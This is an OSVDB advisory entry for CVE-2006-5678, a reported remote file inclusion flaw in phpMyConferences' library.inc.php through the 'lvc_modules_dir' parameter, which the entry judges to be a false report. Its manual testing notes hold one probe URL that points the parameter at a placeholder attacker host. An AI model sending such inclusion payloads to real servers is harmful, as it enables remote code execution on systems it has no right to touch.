phpMyConferences library.inc.php lvc_modules_dir Variable Remote File Inclusion

2006-10-31T03:26:01
ID OSVDB:31168
Type osvdb
Reporter OSVDB
Modified 2006-10-31T03:26:01

Description

Vulnerability Description

phpMyConferences has been reported to contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is supposedly due to the library.inc.php script not properly sanitizing user input supplied to the 'lvc_modules_dir' variable. However, this variable is set before an attacker can supply input, and it cannot be manipulated as suggested.

Solution Description

The vulnerability reported is incorrect. No solution required.

Manual Testing Notes

http://[target]/phpMyConferences_8.0.2/common/visiteurs/include/library.inc.php?lvc_modules_dir=http://[attacker]/

References:

Mail List Post: http://attrition.org/pipermail/vim/2006-November/001105.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0504.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0041.html
ISS X-Force ID: 29919
CVE-2006-5678